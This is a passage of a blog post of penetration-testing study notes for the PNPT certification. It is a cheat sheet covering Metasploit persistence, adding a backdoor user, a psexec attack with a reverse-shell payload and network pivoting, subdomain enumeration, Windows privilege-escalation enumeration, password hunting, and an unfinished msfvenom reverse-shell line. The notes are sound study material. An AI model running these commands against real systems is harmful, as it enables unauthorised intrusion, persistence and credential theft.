</pre></table></code></div></div><p>Meterpreter shell also has built in ways to upload/download files.</p><h3 id="maintaining-access"><span class="mr-2">Maintaining Access</span><a href="#maintaining-access" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p><strong>Persistence Scripts:</strong></p><p>run persistence -h</p><p>exploit/windows/local/persistence</p><p>exploit/windows/local/registry_persistence</p><p><strong>Scheduled Tasks</strong></p><p>run scheduleme</p><p>run schtaskabuse</p><p><strong>Add a User</strong></p><p>net user username password /add</p><h3 id="pivoting"><span class="mr-2">Pivoting</span><a href="#pivoting" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre>msfconsole
use exploit/windows/smb/psexec
options
<span class="nb">set </span>rhosts &lt;victim ip&gt;
<span class="nb">set </span>smbpass &lt;password&gt;
<span class="nb">set </span>smbuser &lt;user&gt;
<span class="nb">set </span>payload windows/x64/meterpreter/reverse_tcp
<span class="nb">set </span>lhost &lt;interface&gt;
<span class="nb">set </span>target 2
run
shell
route print
arp <span class="nt">-a</span>
^C y
run autoroute <span class="nt">-s</span> &lt;unreachable subnet&gt;/24
run autoroute <span class="nt">-p</span>
background
</pre></table></code></div></div><p>proxychains, chisel, ssh, lots of different tools.</p><h2 id="clean-up"><span class="mr-2">Clean up</span><a href="#clean-up" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Make the system as it was when you entered it: remove executables, scripts, added files or users, malware, rootkits, and revert settings to their original configuration.</p><h1 id="web-applications">Web Applications</h1><h2 id="email-enumeration"><span class="mr-2">Email Enumeration</span><a href="#email-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>hunter(.)io</p><p>phonebook(.)cz</p><p>tools(.)verifyemailaddress(.)io</p><h2 id="subdomain-enumeration"><span class="mr-2">Subdomain Enumeration</span><a href="#subdomain-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>sublist3r <span class="nt">-d</span> corp<span class="o">(</span>dot<span class="o">)</span>com
</pre></table></code></div></div><p>crt(.)sh %.corp.com, does certificate fingerprinting.</p><p>Asset Finder</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>go get <span class="nt">-u</span> github.com/tomnomnom/assetfinder  <span class="o">(</span>Use pimpmykali to fix Go first<span class="o">)</span>
assetfinder domain.com <span class="o">&gt;&gt;</span> output.txt
</pre></table></code></div></div><p>Amass</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="nb">export </span><span class="nv">GO111MODULE</span><span class="o">=</span>on
go get <span class="nt">-v</span> <span class="nt">-u</span> github.com/OWASP/AMmass/v3/...
amass enum <span class="nt">-d</span> domain.com <span class="o">&gt;&gt;</span> subs.txt
</pre></table></code></div></div><p>httprobe checks if domains are up</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>go get <span class="nt">-u</span> github.com/tomnomnom/httprobe
<span class="nb">cat </span>subdomains.txt | httprobe <span class="nt">-s</span> <span class="nt">-p</span> https://443
</pre></table></code></div></div><h2 id="host-discovery"><span class="mr-2">Host Discovery</span><a href="#host-discovery" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>netdiscover <span class="nt">-r</span> x.x.x.0/24 will sweep an entire subnet.
</pre></table></code></div></div><h2 id="owasp-top-10"><span class="mr-2">OWASP top 10</span><a href="#owasp-top-10" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><ol><li><p>Injection</p><li><p>Broken Authentication</p><li><p>Sensitive Data Exposure</p><li><p>XML External Entities (XXE)</p><li><p>Broken Access Control</p><li><p>Security Misconfiguration</p><li><p>Cross-Site Scripting</p><li><p>Insecure Deserialization</p><li><p>Using Components with Known Vulnerabilities</p><li><p>Insufficient Logging and Monitoring</p></ol><h1 id="windows-privilege-escalation">Windows Privilege Escalation</h1><h2 id="initial-enumeration"><span class="mr-2">Initial Enumeration</span><a href="#initial-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Systeminfo command will show basic systeminfo, can refine it more with</p><pre><code class="language-cmd">systeminfo | findstr /B /C:"OS NAME" /C:"OS VERSION" /C:"System Type"
</code></pre><p>Can see what version of windows is running, what architecture, etc.</p><pre><code class="language-cmd">wmic qfe get Caption,Description,HotFixID,InstalledOn
</code></pre><p>Will show information regarding latest updates.</p><pre><code class="language-cmd">wmic logicaldisk get caption,description,providername
</code></pre><p>Will show drives available</p><h2 id="user-enumeration"><span class="mr-2">User Enumeration</span><a href="#user-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>whoami /groups and net user are good ones to run, net localgroup, net localgroup administrators</p><h2 id="network-enumeration"><span class="mr-2">Network Enumeration</span><a href="#network-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Ipconfig /all , basic network info, might give info on domain.</p><p>arp -a and route print also give good info</p><p>netstat -ano</p><h2 id="password-hunting"><span class="mr-2">Password Hunting</span><a href="#password-hunting" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>findstr /si password *.txt , *.ini *config</p><h2 id="av-enumeration"><span class="mr-2">AV Enumeration</span><a href="#av-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><pre><code class="language-cmd">sc query windefend
</code></pre><p>Will show if Windows Defender is running</p><pre><code class="language-cmd">sc queryex type= service
</code></pre><p>Will show all services running on machine.</p><pre><code class="language-cmd">netsh advfirewall dump
or
netsh firewall show state
</code></pre><p>Will show firewall information.</p><pre><code class="language-cmd">netsh firewall show config
</code></pre><p>Shows firewall config</p><p>run post/multi/recon/local_exploit_suggester - random metasploit info</p><h2 id="kernel-exploits"><span class="mr-2">Kernel Exploits</span><a href="#kernel-exploits" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Kernel is a program that controls everything in the system. Facilitates interactions between hardware and software components, acts as a translator.</p><p>https://github(.)com/SecWiki/windows-kernel-exploits</p><p>``` msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip=""> LPORT=<attacker port=""></attacker></attacker></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/notes/'>notes</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/pnpt/" class="post-tag no-text-decoration" >pnpt</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=PNPT+Notes+-+Anubis-Sec&url=https%3A%2F%2Fahmedel-rayes.github.io%2Fposts%2FPNPT%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=PNPT+Notes+-+Anubis-Sec&u=https%3A%2F%2Fahmedel-rayes.github.io%2Fposts%2FPNPT%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Fahmedel-rayes.github.io%2Fposts%2FPNPT%2F&text=PNPT+Notes+-+Anubis-Sec" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/CPTS/">Certified Penetration Testing Specialist Notes</a><li><a href="/posts/CRTP/">Certified Red Team Professional Notes</a><li><a href="/posts/PortSwigger/">Port Swigger Academy Notes</a><li><a href="/posts/PNPT/">PNPT Notes</a><li><a href="/posts/ConsoleCowboy/">The Way of the Console Cowboy</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/outdated-software/">Outdated Software</a> <a class="post-tag" href="/tags/password-cracking/">Password Cracking</a> <a class="post-tag" href="/tags/hash-capture/">Hash Capture</a> <a class="post-tag" href="/tags/public-vulnerabilities/">Public Vulnerabilities</a> <a class="post-tag" href="/tags/weak-credentials/">Weak Credentials</a> <a class="post-tag" href="/tags/active-directory/">Active Directory</a> <a class="post-tag" href="/tags/anonymous-access/">Anonymous Access</a> <a class="post-tag" href="/tags/educational/">Educational</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/CRTP/"><div class="card-body"> <em class="small" data-ts="1678224180" data-df="ll" > Mar 7, 2023 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Certified Red Team Professional Notes</h3><div class="text-muted small"><p> Certified Red Team Professional Notes Week 1 • Enumerate useful information like users, groups, group memberships, computers, user properties, trusts, ACLs etc. to map attack paths! • Learn and...</p></div></div></a></div><div class="card"> <a href="/posts/CPTS/"><div class="card-body"> <em class="small" data-ts="1680279120" data-df="ll" > Mar 31, 2023 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Certified Penetration Testing Specialist Notes</h3><div class="text-muted small"><p> Network Enumeration with Nmap Nmap is one of the most used tools by network admins and IT security specialists, it can be used to Audit the security aspects of networks, simulate penetration tests...</p></div></div></a></div><div class="card"> <a href="/posts/Nibbles/"><div class="card-body"> <em class="small" data-ts="1675888020" data-df="ll" > Feb 8, 2023 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Nibbles</h3><div class="text-muted small"><p> Nibbles is an easy level Linux machine on HacktheBox. We start by getting a foothold by guessing user credentials for a blog site, and finding out we can upload and execute arbitrary PHP files. Usi...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/Blue/" class="btn btn-outline-primary" prompt="Older"><p>Blue</p></a> <a href="/posts/ConsoleCowboy/" class="btn btn-outline-primary" prompt="Newer"><p>The Way of the Console Cowboy</p></a></div></div></div><footer class="row pl-3 pr-3"><div class="col-12 d-flex justify-content-between align-items-center text-muted pl-0 pr-0"><div class="footer-left"><p class="mb-0"> © 2023 <a href="https://github.com/AhmedEl-Rayes">Ahmed El-Rayes</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/outdated-software/">Outdated Software</a> <a class="post-tag" href="/tags/password-cracking/">Password Cracking</a> <a class="post-tag" href="/tags/hash-capture/">Hash Capture</a> <a class="post-tag" href="/tags/public-vulnerabilities/">Public Vulnerabilities</a> <a class="post-tag" href="/tags/weak-credentials/">Weak Credentials</a> <a class="post-tag" href="/tags/active-directory/">Active Directory</a> <a class="post-tag" href="/tags/anonymous-access/">Anonymous Access</a> <a class="post-tag" href="/tags/educational/">Educational</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a><div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-animation="true" data-autohide="false"><div class="toast-header"> <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close"> <span aria-hidden="true">&times;</span> </button></div><div class="toast-body text-center pt-0"><p class="pl-2 pr-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></div><script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
